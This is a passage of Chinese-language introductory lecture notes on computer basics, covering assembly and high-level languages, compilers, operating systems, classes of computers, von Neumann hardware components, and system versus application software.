• 汇编语言:人们用一些约定的文字、符号和数字
按规定的格式来表示各种不同的指令 • 再用这些特殊符号表示的指令来编写程序 • 借助于汇编程序,把符号语言表示的程序(称为汇编
源程序)翻译成用机器语言表示的目的程序
高级语言源程序
• 创造了各种接近于数学语言的算法语言 • 优点:比较接近数学语言,直观通用,与具体
机器无关
高级语言源程序
• 用算法语言编写的程序称为高级语言源程序
• 这种源程序是不能由机器直接识别和执行的 • 计算机用编译程序(GCC, VC++),它把源程序翻
译成目的程序
操作系统
• 操作系统的由来
• 为了摆脱用户直接使用机器并独占机器这种情况,依靠计算机来管 理自己和管理用户,于是人们又创造出一类程序,叫做操作系统。
通用计算机又分为巨型机、大型机、中型机、小型机、微型机、 单片机六类,其结构复杂性、性能、价格、依次递减。
• 计算机的硬件是由有形的电子器件等构成的,它 包括
• • • • • 运算器 存储器 控制器 输入设备 输出设备
• 存储程序并按地址顺序执行,这是冯·诺依曼型计 算机的工作原理,也是计算机自动化工作的关键。
• 计算机软件一般分为系统程序和应用程序两大类。 • 系统程序用来:
• 简化程序设计,简化使用方法 • 提高计算机的使用效率,发挥和扩大计算机的功能和 用途, • 包括:
(1)各种服务程序 (2)语言类程序 (3)操作系统 (4)数据库管理系统
• 应用程序是针对特定应用课题领域开发的软件。

计算机系统是一个由硬件、软件组成的多 级层次结构 它通常的组成
相关文档
最新文档